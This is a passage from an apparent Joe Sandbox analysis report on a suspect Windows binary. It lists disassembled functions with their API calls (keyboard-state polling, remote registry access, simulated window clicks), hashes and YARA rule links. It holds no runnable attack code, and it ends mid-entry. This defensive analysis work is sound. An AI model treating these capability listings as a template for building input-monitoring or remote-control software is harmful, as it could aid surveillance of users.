Instruction Fuzzy Hash: EB216070A00108AFCB10EF65CC45DAEB7B8EF89714F104469F909E7392DB71EA45DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F2AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

Part of subcall function 00F2AA52: SendMessageTimeoutW.USER32 ref: 00F2AA6F
Part of subcall function 00F2AA52: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F2AA82
Part of subcall function 00F2AA52: GetCurrentThreadId.KERNEL32 ref: 00F2AA89
Part of subcall function 00F2AA52: AttachThreadInput.USER32(00000000), ref: 00F2AA90

GetFocus.USER32(00F60980), ref: 00F2AC2A

Part of subcall function 00F2AA9B: GetParent.USER32(?), ref: 00F2AAA9

GetClassNameW.USER32 ref: 00F2AC73
EnumChildWindows.USER32 ref: 00F2AC9B
__swprintf.LIBCMT ref: 00F2ACB5

Strings

%s%d, xrefs: 00F2ACAF

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 482243c80b4e4dd9a5f94119523e1e08d4f991c54b3aeeada8034f49ebf749fb
Instruction ID: 828a5968b7ba265ef7bd4a26602dc0d44f3575bb18fb877946ffb44af66f23c5
Opcode Fuzzy Hash: 482243c80b4e4dd9a5f94119523e1e08d4f991c54b3aeeada8034f49ebf749fb
Instruction Fuzzy Hash: BB113670600218ABCF01BFA0ED85FEA33ACEF44310F0040B5FE18AA142CA749844EB72

Uniqueness

Uniqueness Score: -1.00%

Function 00F322E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00F32318

Strings

EXISTS, xrefs: 00F32340
APPEND, xrefs: 00F32351
KEYS, xrefs: 00F3232F
REMOVE, xrefs: 00F3231E

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 19390637572b49dc36f1b1d872023ec78170a0f65c7f06667524049fe25224e2
Instruction ID: a7a2df3d8cae21cfb10d5c7a422c66ed39c9448f94e2bcd8838c915acf94b337
Opcode Fuzzy Hash: 19390637572b49dc36f1b1d872023ec78170a0f65c7f06667524049fe25224e2
Instruction Fuzzy Hash: CF117C3094011C9BDF00EF94D8904FEB3B4FF15314F2044A8D814A7263EB325D0ADB40

Uniqueness

Uniqueness Score: -1.00%

Function 00F4F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00F4F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00F4F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00F4F453
CloseHandle.KERNEL32(?), ref: 00F4F4D4

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: ef0a065431b11349eeea8dea9f9ace3ee4f1b353dab32a4306a58aa15e56cc9e
Instruction ID: d236f53cb5f14163719c84d33995cf766b94a2cbd14afe5d41a3809679dbdca0
Opcode Fuzzy Hash: ef0a065431b11349eeea8dea9f9ace3ee4f1b353dab32a4306a58aa15e56cc9e
Instruction Fuzzy Hash: E98171B16007009FD720EF24D846F2AB7E5EF58720F14891EF959AB3D2DBB1AC458B51

Uniqueness

Uniqueness Score: -1.00%

Function 00F50697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00EE1A36: _memmove.LIBCMT ref: 00EE1A77

Part of subcall function 00F5147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F5040D,?,?), ref: 00F51491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F5075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F5079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00F507E3
RegCloseKey.ADVAPI32(?,?), ref: 00F5080F
RegCloseKey.ADVAPI32(00000000), ref: 00F5081C

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: a064ccab7ab95a877bca7e5737f5bb509a680cf430e1edd8e4b4b87022a9cc08
Instruction ID: 6e80e0d20912be5f13cd80d746588376f469b9a946a9f7f482978d275eaa2f8f
Opcode Fuzzy Hash: a064ccab7ab95a877bca7e5737f5bb509a680cf430e1edd8e4b4b87022a9cc08
Instruction Fuzzy Hash: 56517B71208208AFC704EF64CC81F6AB7E9FF88315F10491DFA95972A1DB30E909DB52

Uniqueness

Uniqueness Score: -1.00%

Function 00F3EBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32 ref: 00F3EC62
GetPrivateProfileSectionW.KERNEL32 ref: 00F3EC8B
WritePrivateProfileSectionW.KERNEL32 ref: 00F3ECCA

Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00F3ECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00F3ECF7

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: 46dc568a788bb2be28d39781f61aadbe41a2484535def8e3f30114ca35cb5a09
Instruction ID: fb0ab363c52f37429badb6fba73a64806c965696ba7649155c466d9136f732d5
Opcode Fuzzy Hash: 46dc568a788bb2be28d39781f61aadbe41a2484535def8e3f30114ca35cb5a09
Instruction Fuzzy Hash: CC512975A00519DFCB01EF65C985EAEBBF5EF08314B148099E909AB3A2CB31ED51DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00F5A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a1a7bec9ea7b2230d9f9f145422484ad8f943345e538b6fdce676309e8f164
Instruction ID: cbcf0e203c621cb7c8b170c8a174b28c60c59df3ccc06841f4352fc76f30fe7a
Opcode Fuzzy Hash: e4a1a7bec9ea7b2230d9f9f145422484ad8f943345e538b6fdce676309e8f164
Instruction Fuzzy Hash: 6B41D435D00208AFD710DB24DC44FAABBB4EB0D362F140365EE26A72D1D7709E65FA61

Uniqueness

Uniqueness Score: -1.00%

Function 00ED2714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?,?,00F977B0,?,00F977B0,00F977B0,?,00F5C5FF,00000000,00000001,?,?,?,00F0BD40,?,?), ref: 00ED2727
ScreenToClient.USER32 ref: 00ED2744
GetAsyncKeyState.USER32(00000001), ref: 00ED2769
GetAsyncKeyState.USER32(00000002), ref: 00ED2777

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 6b9359866fd39e7a47bb20704b14419d50bd6f81ccd16930835357862cf39966
Instruction ID: a5ff5203ed68a3b1d042ea56a5bf6dd425ef286a88d1ff101d9b614a2557935b
Opcode Fuzzy Hash: 6b9359866fd39e7a47bb20704b14419d50bd6f81ccd16930835357862cf39966
Instruction Fuzzy Hash: B9418135904109FFDF259F68C844AE9BB74FB15324F20831BF929A62D0CB31AD94EB91

Uniqueness

Uniqueness Score: -1.00%

Function 00ED52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00ED52E6
PeekMessageW.USER32 ref: 00ED534A
TranslateMessage.USER32(?), ref: 00ED5356
DispatchMessageW.USER32 ref: 00ED5360

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: a6307c70158f30e3479e08650735f2d44cd26f5f48fd799638234c433d59aa43
Instruction ID: 26982eb6c77e93ad0a993eb27e83009719f275c8b222636fa831a920f15ed026
Opcode Fuzzy Hash: a6307c70158f30e3479e08650735f2d44cd26f5f48fd799638234c433d59aa43
Instruction Fuzzy Hash: 83312A3191870A9BEB309BA8DC44FFA77E8DB01344F24505BE422A72E4D7B5984AF711

Uniqueness

Uniqueness Score: -1.00%

Function 00F295D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32 ref: 00F295E8
PostMessageW.USER32(?,00000201,00000001), ref: 00F29692
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00F2969A
PostMessageW.USER32(?,00000202,00000000), ref: 00F296A8
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00F296B0

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 11baf24f7893b044f4ebb6dc264ce3a0166c511760b040a3a699de698963fade
Instruction ID: 1868563bc55415d2d577c0c2e8c659d95218c8714feac086dec10fb5dadeb206
Opcode Fuzzy Hash: 11baf24f7893b044f4ebb6dc264ce3a0166c511760b040a3a699de698963fade
Instruction Fuzzy Hash: D931BC71904229EFDB14CF68E94CA9E3FB5FB45325F104229F924AB2D1C7B09924EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F2BD85 Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00F2BD9D
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00F2BDBA
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00F2BDF2
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00F2BE18
_wcsstr.LIBCMT ref: 00F2BE22

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: ba5922c1fb7cdab86d01d988300838376010256648a4d0fb7fdf6ca01527de7a
Instruction ID: 8c3f0ef375333b36a7cea914bade8fc16fcefa7400c7da0115c6618a43f6475e
Opcode Fuzzy Hash: ba5922c1fb7cdab86d01d988300838376010256648a4d0fb7fdf6ca01527de7a
Instruction Fuzzy Hash: 76213832604618BBEB255B35EC09FBB7BECDF44760F114069FE09DA191EFA1DC40A2A0

Uniqueness

Uniqueness Score: -1.00%

Function 00F5B7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3

GetWindowLongW.USER32(?,000000F0), ref: 00F5B804
SetWindowLongW.USER32 ref: 00F5B829
SetWindowLongW.USER32 ref: 00F5B841
GetSystemMetrics.USER32 ref: 00F5B86A
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00F4155C,00000000), ref: 00F5B888

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: c7de9da1f8f47b0da531fc3545d14b5e314430e9f0befdef511e5b81e5afa9b7
Instruction ID: 4720899665db011a1f9bc8041e0dc044f27648dc77fe7a1659077b531f8594cd
Opcode Fuzzy Hash: c7de9da1f8f47b0da531fc3545d14b5e314430e9f0befdef511e5b81e5afa9b7
Instruction Fuzzy Hash: 11218031914619AFCB209F389C08B6A3BA8EB05736F244729FE22D21E0D7709815EB80

Uniqueness

Uniqueness Score: -1.00%

Function 00F29EBF Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00F29ED8

Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F29F0A
__itow.LIBCMT ref: 00F29F22
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F29F4A
__itow.LIBCMT ref: 00F29F5B

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 2e03d0c601a49c54271178422bec1993295f846bcfb6015a9ba4753972d8c4cc
Instruction ID: c4a20f61fc8c0e60620d5ba7285a659a150fc8a5aa76f645cebb8c758ae645ec
Opcode Fuzzy Hash: 2e03d0c601a49c54271178422bec1993295f846bcfb6015a9ba4753972d8c4cc
Instruction Fuzzy Hash: 95210A31B04258BBDB509A65DD89EEF7BA9EF85720F144025F900EB241DAF1C941B7E2

Uniqueness

Uniqueness Score: -1.00%

Function 00F46138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00F46159
GetForegroundWindow.USER32 ref: 00F46170
GetDC.USER32(00000000), ref: 00F461AC
GetPixel.GDI32(00000000,?,00000003), ref: 00F461B8
ReleaseDC.USER32 ref: 00F461F3

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 3eec03dd47c03961c6aaa59eb51903962c31868c85e5905642a6db25c0e70a16
Instruction ID: 7abb8a94b35f866dffa0dadb6343c42d6672c80b3bd017b26055967078a3742d
Opcode Fuzzy Hash: 3eec03dd47c03961c6aaa59eb51903962c31868c85e5905642a6db25c0e70a16
Instruction Fuzzy Hash: C621D475A002049FD700EF64CD84A5ABBF5EF88351F108469F81AD7362CE71AC01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00ED16CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00ED1729
SelectObject.GDI32(?,00000000), ref: 00ED1738
BeginPath.GDI32(?), ref: 00ED174F
SelectObject.GDI32(?,00000000), ref: 00ED1778

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: fbec91c6c54ff023440a84affe5413a2233c0586b6bd0364fd0c216d759f6955
Instruction ID: beba4e87076662d0c9b14eea68b1e97a258abc83d8d8917dc0852c262d367638
Opcode Fuzzy Hash: fbec91c6c54ff023440a84affe5413a2233c0586b6bd0364fd0c216d759f6955
Instruction Fuzzy Hash: 7C21533091430CFFDB11AF64DD487AE7BA9FB01325F244257F825A62B0D7B19992EB90

Uniqueness

Uniqueness Score: -1.00%

Function 00F2C837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 00F2C84C
_memcmp.LIBCMT ref: 00F2C86A
_memcmp.LIBCMT ref: 00F2C87D
_memcmp.LIBCMT ref: 00F2C895
_memcmp.LIBCMT ref: 00F2C8AD

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: c9bab3b7839d3fffa8158b537ffef6dc77ee7464e7ef4c6559384733a32d6eb0
Instruction ID: fd3b19e2d62da27fcd606172cf524463a46756c6ee1ab8fca99f8f5d1e4f7dd5
Opcode Fuzzy Hash: c9bab3b7839d3fffa8158b537ffef6dc77ee7464e7ef4c6559384733a32d6eb0
Instruction Fuzzy Hash: F6019273E4012D7BD214A511AC82FFF739C9A60394B058125FE06A6741E760DE15A2E1

Uniqueness

Uniqueness Score: -1.00%

Function 00F3504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00F35075
__beginthreadex.LIBCMT ref: 00F35093
MessageBoxW.USER32(?,?,?,?), ref: 00F350A8
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00F350BE
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00F350C5

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 298ff62feba7b1404df202bd5aa73381f46dcb8e9f689c182670027edebd4dbd
Instruction ID: 22b5b318f13c031237941c9fd29f3f53b76b59129411566e8cef84db602ec30f
Opcode Fuzzy Hash: 298ff62feba7b1404df202bd5aa73381f46dcb8e9f689c182670027edebd4dbd
Instruction Fuzzy Hash: 69110CB291470D7BC7019BA89C04A9B7BACAB86730F140256F824D3350D6B289009BF1

Uniqueness

Uniqueness Score: -1.00%

Function 00F28E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32 ref: 00F28E3C
GetLastError.KERNEL32(?,00F28900,?,?,?), ref: 00F28E46
GetProcessHeap.KERNEL32(00000008,?,?,00F28900,?,?,?), ref: 00F28E55
HeapAlloc.KERNEL32(00000000,?,00F28900,?,?,?), ref: 00F28E5C
GetUserObjectSecurity.USER32 ref: 00F28E73

Memory Dump Source

Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true

Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 4f568c7a74875eb5507e12f13575f03759bd064bf45d3712e01a1a7c6be9c7b5
Instruction ID: 5a1a6eee732755e06f60f46eab33a3a1acf15215e8ce54eb34f9a0faacec1847
